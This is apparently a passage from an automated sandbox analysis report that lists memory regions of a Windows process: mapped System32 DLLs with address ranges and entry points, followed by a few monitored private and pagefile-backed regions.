region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 1055
start_va = 0x7ffa0e2c0000
end_va = 0x7ffa0e3cdfff
monitored = 0
entry_point = 0x7ffa0e30eaa0
region_type = mapped_file
name = "mrmcorer.dll"
filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll")
Region:
id = 1056
start_va = 0x7ffa0e6d0000
end_va = 0x7ffa0e724fff
monitored = 0
entry_point = 0x7ffa0e6d3fb0
region_type = mapped_file
name = "policymanager.dll"
filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll")
Region:
id = 1057
start_va = 0x7ffa0e730000
end_va = 0x7ffa0e766fff
monitored = 0
entry_point = 0x7ffa0e736020
region_type = mapped_file
name = "gnssadapter.dll"
filename = "\\Windows\\System32\\GnssAdapter.dll" (normalized: "c:\\windows\\system32\\gnssadapter.dll")
Region:
id = 1058
start_va = 0x7ffa0e770000
end_va = 0x7ffa0e78ffff
monitored = 0
entry_point = 0x7ffa0e7739a0
region_type = mapped_file
name = "locationwinpalmisc.dll"
filename = "\\Windows\\System32\\LocationWinPalMisc.dll" (normalized: "c:\\windows\\system32\\locationwinpalmisc.dll")
Region:
id = 1059
start_va = 0x7ffa0e790000
end_va = 0x7ffa0e7a6fff
monitored = 0
entry_point = 0x7ffa0e795630
region_type = mapped_file
name = "sens.dll"
filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll")
Region:
id = 1060
start_va = 0x7ffa0e7b0000
end_va = 0x7ffa0e7c2fff
monitored = 0
entry_point = 0x7ffa0e7b57f0
region_type = mapped_file
name = "themeservice.dll"
filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll")
Region:
id = 1061
start_va = 0x7ffa0e850000
end_va = 0x7ffa0e87dfff
monitored = 0
entry_point = 0x7ffa0e857550
region_type = mapped_file
name = "netjoin.dll"
filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll")
Region:
id = 1062
start_va = 0x7ffa0e880000
end_va = 0x7ffa0e895fff
monitored = 0
entry_point = 0x7ffa0e881b60
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 1063
start_va = 0x7ffa0e8a0000
end_va = 0x7ffa0e903fff
monitored = 0
entry_point = 0x7ffa0e8b5ae0
region_type = mapped_file
name = "wevtapi.dll"
filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")
Region:
id = 1064
start_va = 0x7ffa0ead0000
end_va = 0x7ffa0eb10fff
monitored = 0
entry_point = 0x7ffa0ead4840
region_type = mapped_file
name = "usermgrproxy.dll"
filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll")
Region:
id = 1065
start_va = 0x7ffa0eb20000
end_va = 0x7ffa0eb2bfff
monitored = 0
entry_point = 0x7ffa0eb214d0
region_type = mapped_file
name = "locationframeworkps.dll"
filename = "\\Windows\\System32\\LocationFrameworkPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkps.dll")
Region:
id = 1066
start_va = 0x7ffa0eb30000
end_va = 0x7ffa0ec65fff
monitored = 0
entry_point = 0x7ffa0eb5f350
region_type = mapped_file
name = "wintypes.dll"
filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll")
Region:
id = 1067
start_va = 0x7ffa0ec70000
end_va = 0x7ffa0ed55fff
monitored = 0
entry_point = 0x7ffa0ec8cf10
region_type = mapped_file
name = "usermgr.dll"
filename = "\\Windows\\System32\\usermgr.dll" (normalized: "c:\\windows\\system32\\usermgr.dll")
Region:
id = 1068
start_va = 0x7ffa0ed60000
end_va = 0x7ffa0ee27fff
monitored = 0
entry_point = 0x7ffa0eda13f0
region_type = mapped_file
name = "winhttp.dll"
filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")
Region:
id = 1069
start_va = 0x7ffa0ee30000
end_va = 0x7ffa0ee90fff
monitored = 0
entry_point = 0x7ffa0ee34b50
region_type = mapped_file
name = "wlanapi.dll"
filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll")
Region:
id = 1070
start_va = 0x7ffa0eea0000
end_va = 0x7ffa0f01bfff
monitored = 0
entry_point = 0x7ffa0eef1650
region_type = mapped_file
name = "locationframework.dll"
filename = "\\Windows\\System32\\LocationFramework.dll" (normalized: "c:\\windows\\system32\\locationframework.dll")
Region:
id = 1071
start_va = 0x7ffa0f020000
end_va = 0x7ffa0f02afff
monitored = 0
entry_point = 0x7ffa0f021770
region_type = mapped_file
name = "lfsvc.dll"
filename = "\\Windows\\System32\\lfsvc.dll" (normalized: "c:\\windows\\system32\\lfsvc.dll")
Region:
id = 1072
start_va = 0x7ffa0f030000
end_va = 0x7ffa0f06dfff
monitored = 0
entry_point = 0x7ffa0f03a050
region_type = mapped_file
name = "logoncli.dll"
filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll")
Region:
id = 1073
start_va = 0x7ffa0f070000
end_va = 0x7ffa0f096fff
monitored = 0
entry_point = 0x7ffa0f073bf0
region_type = mapped_file
name = "profsvcext.dll"
filename = "\\Windows\\System32\\profsvcext.dll" (normalized: "c:\\windows\\system32\\profsvcext.dll")
Region:
id = 1074
start_va = 0x7ffa0f0a0000
end_va = 0x7ffa0f0e9fff
monitored = 0
entry_point = 0x7ffa0f0aac30
region_type = mapped_file
name = "deviceaccess.dll"
filename = "\\Windows\\System32\\deviceaccess.dll" (normalized: "c:\\windows\\system32\\deviceaccess.dll")
Region:
id = 1075
start_va = 0x7ffa0f0f0000
end_va = 0x7ffa0f144fff
monitored = 0
entry_point = 0x7ffa0f0ffc00
region_type = mapped_file
name = "profsvc.dll"
filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll")
Region:
id = 1076
start_va = 0x7ffa0f190000
end_va = 0x7ffa0f221fff
monitored = 0
entry_point = 0x7ffa0f1da780
region_type = mapped_file
name = "msvcp110_win.dll"
filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll")
Region:
id = 1077
start_va = 0x7ffa0f2b0000
end_va = 0x7ffa0f2bcfff
monitored = 0
entry_point = 0x7ffa0f2b1420
region_type = mapped_file
name = "winrnr.dll"
filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll")
Region:
id = 1078
start_va = 0x7ffa0f2d0000
end_va = 0x7ffa0f2dffff
monitored = 0
entry_point = 0x7ffa0f2d2c60
region_type = mapped_file
name = "usermgrcli.dll"
filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll")
Region:
id = 1079
start_va = 0x7ffa0f2e0000
end_va = 0x7ffa0f2ecfff
monitored = 0
entry_point = 0x7ffa0f2e2ca0
region_type = mapped_file
name = "csystemeventsbrokerclient.dll"
filename = "\\Windows\\System32\\CSystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\csystemeventsbrokerclient.dll")
Region:
id = 1080
start_va = 0x7ffa0f2f0000
end_va = 0x7ffa0f31efff
monitored = 0
entry_point = 0x7ffa0f2f8910
region_type = mapped_file
name = "wptaskscheduler.dll"
filename = "\\Windows\\System32\\WPTaskScheduler.dll" (normalized: "c:\\windows\\system32\\wptaskscheduler.dll")
Region:
id = 1081
start_va = 0x7ffa0f370000
end_va = 0x7ffa0f3ddfff
monitored = 0
entry_point = 0x7ffa0f377f60
region_type = mapped_file
name = "taskcomp.dll"
filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll")
Region:
id = 1082
start_va = 0x7ffa0f3e0000
end_va = 0x7ffa0f3f0fff
monitored = 0
entry_point = 0x7ffa0f3e3320
region_type = mapped_file
name = "wmiclnt.dll"
filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll")
Region:
id = 1083
start_va = 0x7ffa0f430000
end_va = 0x7ffa0f465fff
monitored = 0
entry_point = 0x7ffa0f440070
region_type = mapped_file
name = "xmllite.dll"
filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")
Region:
id = 1084
start_va = 0x7ffa0fc30000
end_va = 0x7ffa0fc70fff
monitored = 0
entry_point = 0x7ffa0fc47eb0
region_type = mapped_file
name = "ubpm.dll"
filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll")
Region:
id = 1085
start_va = 0x7ffa0fc80000
end_va = 0x7ffa0fd7bfff
monitored = 0
entry_point = 0x7ffa0fcb6df0
region_type = mapped_file
name = "schedsvc.dll"
filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll")
Region:
id = 1086
start_va = 0x7ffa0fe10000
end_va = 0x7ffa0fecefff
monitored = 0
entry_point = 0x7ffa0fe31c50
region_type = mapped_file
name = "taskschd.dll"
filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll")
Region:
id = 1087
start_va = 0x7ffa0ff20000
end_va = 0x7ffa0ff29fff
monitored = 0
entry_point = 0x7ffa0ff21660
region_type = mapped_file
name = "dsrole.dll"
filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll")
Region:
id = 1088
start_va = 0x7ffa0ff30000
end_va = 0x7ffa0ff47fff
monitored = 0
entry_point = 0x7ffa0ff35910
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 1089
start_va = 0x7ffa0ff50000
end_va = 0x7ffa1009cfff
monitored = 0
entry_point = 0x7ffa0ff93da0
region_type = mapped_file
name = "gpsvc.dll"
filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll")
Region:
id = 1090
start_va = 0x7ffa10b10000
end_va = 0x7ffa10b1afff
monitored = 0
entry_point = 0x7ffa10b11de0
region_type = mapped_file
name = "bitsperf.dll"
filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll")
Region:
id = 1091
start_va = 0x7ffa10cc0000
end_va = 0x7ffa11152fff
monitored = 0
entry_point = 0x7ffa10ccf760
region_type = mapped_file
name = "actxprxy.dll"
filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll")
Region:
id = 1092
start_va = 0x7ffa11160000
end_va = 0x7ffa111c6fff
monitored = 0
entry_point = 0x7ffa1117e710
region_type = mapped_file
name = "bcp47langs.dll"
filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll")
Region:
id = 1093
start_va = 0x7ffa11220000
end_va = 0x7ffa113a5fff
monitored = 0
entry_point = 0x7ffa1126d700
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 1094
start_va = 0x7ffa113b0000
end_va = 0x7ffa113cbfff
monitored = 0
entry_point = 0x7ffa113b37a0
region_type = mapped_file
name = "samlib.dll"
filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll")
Region:
id = 1095
start_va = 0x7ffa113f0000
end_va = 0x7ffa1140efff
monitored = 0
entry_point = 0x7ffa113f4960
region_type = mapped_file
name = "ncprov.dll"
filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll")
Region:
id = 1096
start_va = 0x7ffa11410000
end_va = 0x7ffa11422fff
monitored = 0
entry_point = 0x7ffa11412760
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 1097
start_va = 0x7ffa114c0000
end_va = 0x7ffa114c9fff
monitored = 0
entry_point = 0x7ffa114c1350
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 1098
start_va = 0x7ffa11580000
end_va = 0x7ffa115f8fff
monitored = 0
entry_point = 0x7ffa1159fb90
region_type = mapped_file
name = "apphelp.dll"
filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll")
Region:
id = 1099
start_va = 0x7ffa11600000
end_va = 0x7ffa11607fff
monitored = 0
entry_point = 0x7ffa116013e0
region_type = mapped_file
name = "dabapi.dll"
filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll")
Region:
id = 1100
start_va = 0x7ffa11640000
end_va = 0x7ffa1167ffff
monitored = 0
entry_point = 0x7ffa11651960
region_type = mapped_file
name = "brokerlib.dll"
filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll")
Region:
id = 1101
start_va = 0x7ffa117d0000
end_va = 0x7ffa117f6fff
monitored = 0
entry_point = 0x7ffa117d7940
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 1102
start_va = 0x7ffa11800000
end_va = 0x7ffa118a9fff
monitored = 0
entry_point = 0x7ffa11827910
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 1103
start_va = 0x7ffa11a40000
end_va = 0x7ffa11a4bfff
monitored = 0
entry_point = 0x7ffa11a42480
region_type = mapped_file
name = "sysntfy.dll"
filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll")
Region:
id = 1104
start_va = 0x7ffa11b10000
end_va = 0x7ffa11b41fff
monitored = 0
entry_point = 0x7ffa11b22340
region_type = mapped_file
name = "fwbase.dll"
filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll")
Region:
id = 1105
start_va = 0x7ffa11d80000
end_va = 0x7ffa11d8bfff
monitored = 0
entry_point = 0x7ffa11d82790
region_type = mapped_file
name = "hid.dll"
filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll")
Region:
id = 1106
start_va = 0x7ffa11d90000
end_va = 0x7ffa11db3fff
monitored = 0
entry_point = 0x7ffa11d93260
region_type = mapped_file
name = "gpapi.dll"
filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")
Region:
id = 1107
start_va = 0x7ffa11f30000
end_va = 0x7ffa12023fff
monitored = 0
entry_point = 0x7ffa11f3a960
region_type = mapped_file
name = "ucrtbase.dll"
filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll")
Region:
id = 1108
start_va = 0x7ffa12080000
end_va = 0x7ffa120c8fff
monitored = 0
entry_point = 0x7ffa1208a090
region_type = mapped_file
name = "authz.dll"
filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll")
Region:
id = 1109
start_va = 0x7ffa121a0000
end_va = 0x7ffa121abfff
monitored = 0
entry_point = 0x7ffa121a27e0
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 1110
start_va = 0x7ffa12280000
end_va = 0x7ffa122b0fff
monitored = 0
entry_point = 0x7ffa12287d10
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 1111
start_va = 0x7ffa122e0000
end_va = 0x7ffa12359fff
monitored = 0
entry_point = 0x7ffa12301a50
region_type = mapped_file
name = "schannel.dll"
filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll")
Region:
id = 1112
start_va = 0x7ffa123a0000
end_va = 0x7ffa123d3fff
monitored = 0
entry_point = 0x7ffa123bae70
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1113
start_va = 0x7ffa123e0000
end_va = 0x7ffa123e9fff
monitored = 0
entry_point = 0x7ffa123e1830
region_type = mapped_file
name = "dpapi.dll"
filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll")
Region:
id = 1114
start_va = 0x7ffa124f0000
end_va = 0x7ffa1250efff
monitored = 0
entry_point = 0x7ffa124f5d30
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 1115
start_va = 0x7ffa12660000
end_va = 0x7ffa126bbfff
monitored = 0
entry_point = 0x7ffa12676f70
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 1116
start_va = 0x7ffa12710000
end_va = 0x7ffa12726fff
monitored = 0
entry_point = 0x7ffa127179d0
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 1117
start_va = 0x7ffa12830000
end_va = 0x7ffa1283afff
monitored = 0
entry_point = 0x7ffa128319a0
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1118
start_va = 0x7ffa12870000
end_va = 0x7ffa12890fff
monitored = 0
entry_point = 0x7ffa12880250
region_type = mapped_file
name = "joinutil.dll"
filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll")
Region:
id = 1119
start_va = 0x7ffa128c0000
end_va = 0x7ffa128f9fff
monitored = 0
entry_point = 0x7ffa128c8d20
region_type = mapped_file
name = "ntasn1.dll"
filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll")
Region:
id = 1120
start_va = 0x7ffa12900000
end_va = 0x7ffa12926fff
monitored = 0
entry_point = 0x7ffa12910aa0
region_type = mapped_file
name = "ncrypt.dll"
filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll")
Region:
id = 1121
start_va = 0x7ffa12a10000
end_va = 0x7ffa12a3cfff
monitored = 0
entry_point = 0x7ffa12a29d40
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 1122
start_va = 0x7ffa12ba0000
end_va = 0x7ffa12bf5fff
monitored = 0
entry_point = 0x7ffa12bb0bf0
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 1123
start_va = 0x7ffa12c00000
end_va = 0x7ffa12c18fff
monitored = 0
entry_point = 0x7ffa12c05e10
region_type = mapped_file
name = "eventaggregation.dll"
filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll")
Region:
id = 1124
start_va = 0x7ffa12c20000
end_va = 0x7ffa12c48fff
monitored = 0
entry_point = 0x7ffa12c34530
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 1125
start_va = 0x7ffa12c50000
end_va = 0x7ffa12ce8fff
monitored = 0
entry_point = 0x7ffa12c7f4e0
region_type = mapped_file
name = "sxs.dll"
filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")
Region:
id = 1126
start_va = 0x7ffa12d90000
end_va = 0x7ffa12da3fff
monitored = 0
entry_point = 0x7ffa12d952e0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 1127
start_va = 0x7ffa12db0000
end_va = 0x7ffa12dbffff
monitored = 0
entry_point = 0x7ffa12db56e0
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 1128
start_va = 0x7ffa12dc0000
end_va = 0x7ffa12e0afff
monitored = 0
entry_point = 0x7ffa12dc35f0
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 1129
start_va = 0x7ffa12e10000
end_va = 0x7ffa12e1efff
monitored = 0
entry_point = 0x7ffa12e13210
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 1130
start_va = 0x7ffa12e20000
end_va = 0x7ffa12e74fff
monitored = 0
entry_point = 0x7ffa12e37970
region_type = mapped_file
name = "wintrust.dll"
filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")
Region:
id = 1131
start_va = 0x7ffa12e80000
end_va = 0x7ffa12f34fff
monitored = 0
entry_point = 0x7ffa12ec22e0
region_type = mapped_file
name = "shcore.dll"
filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")
Region:
id = 1132
start_va = 0x7ffa12f40000
end_va = 0x7ffa13106fff
monitored = 0
entry_point = 0x7ffa12f9db80
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 1133
start_va = 0x7ffa13110000
end_va = 0x7ffa13126fff
monitored = 0
entry_point = 0x7ffa13111390
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 1134
start_va = 0x7ffa13130000
end_va = 0x7ffa13317fff
monitored = 0
entry_point = 0x7ffa1315ba70
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1135
start_va = 0x7ffa13320000
end_va = 0x7ffa13389fff
monitored = 0
entry_point = 0x7ffa13356d50
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 1136
start_va = 0x7ffa13390000
end_va = 0x7ffa133d2fff
monitored = 0
entry_point = 0x7ffa133a4b50
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 1137
start_va = 0x7ffa133e0000
end_va = 0x7ffa13465fff
monitored = 0
entry_point = 0x7ffa133ed8f0
region_type = mapped_file
name = "firewallapi.dll"
filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll")
Region:
id = 1138
start_va = 0x7ffa13520000
end_va = 0x7ffa13b63fff
monitored = 0
entry_point = 0x7ffa136e64b0
region_type = mapped_file
name = "windows.storage.dll"
filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")
Region:
id = 1139
start_va = 0x7ffa13b70000
end_va = 0x7ffa13cb2fff
monitored = 0
entry_point = 0x7ffa13b98210
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1140
start_va = 0x7ffa13cc0000
end_va = 0x7ffa13d5cfff
monitored = 0
entry_point = 0x7ffa13cc78a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1141
start_va = 0x7ffa13d60000
end_va = 0x7ffa13d67fff
monitored = 0
entry_point = 0x7ffa13d61ea0
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 1142
start_va = 0x7ffa13d80000
end_va = 0x7ffa13ed5fff
monitored = 0
entry_point = 0x7ffa13d8a8d0
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1143
start_va = 0x7ffa13ee0000
end_va = 0x7ffa14065fff
monitored = 0
entry_point = 0x7ffa13f2ffc0
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1144
start_va = 0x7ffa14070000
end_va = 0x7ffa140cafff
monitored = 0
entry_point = 0x7ffa140838b0
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1145
start_va = 0x7ffa14220000
end_va = 0x7ffa142c6fff
monitored = 0
entry_point = 0x7ffa1422b4d0
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1146
start_va = 0x7ffa14340000
end_va = 0x7ffa145bcfff
monitored = 0
entry_point = 0x7ffa14414970
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 1147
start_va = 0x7ffa145c0000
end_va = 0x7ffa146dbfff
monitored = 0
entry_point = 0x7ffa146002b0
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1148
start_va = 0x7ffa146e0000
end_va = 0x7ffa1474afff
monitored = 0
entry_point = 0x7ffa146f90c0
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 1149
start_va = 0x7ffa147c0000
end_va = 0x7ffa14880fff
monitored = 0
entry_point = 0x7ffa147e0da0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1150
start_va = 0x7ffa14ba0000
end_va = 0x7ffa14bf1fff
monitored = 0
entry_point = 0x7ffa14baf530
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1151
start_va = 0x7ffa14c00000
end_va = 0x7ffa15028fff
monitored = 0
entry_point = 0x7ffa14c28740
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 1152
start_va = 0x7ffa15030000
end_va = 0x7ffa1508bfff
monitored = 0
entry_point = 0x7ffa1504b720
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 1153
start_va = 0x7ffa15090000
end_va = 0x7ffa15136fff
monitored = 0
entry_point = 0x7ffa150a58d0
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1154
start_va = 0x7ffa15160000
end_va = 0x7ffa1520cfff
monitored = 0
entry_point = 0x7ffa151781a0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1155
start_va = 0x7ffa15210000
end_va = 0x7ffa1676efff
monitored = 0
entry_point = 0x7ffa153711f0
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 1156
start_va = 0x7ffa16770000
end_va = 0x7ffa16930fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1259
start_va = 0x7800000
end_va = 0x78fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007800000"
filename = ""
Region:
id = 1260
start_va = 0x470000
end_va = 0x470fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000470000"
filename = ""
Region:
id = 1263
start_va = 0x470000
end_va = 0x471fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000470000"
filename = ""
Region:
id = 1264
start_va = 0x470000
end_va = 0x470fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000470000"
filename = ""
Region:
id = 1265
start_va = 0x470000
end_va = 0x474fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000470000"
filename = ""
Region:
id = 1266
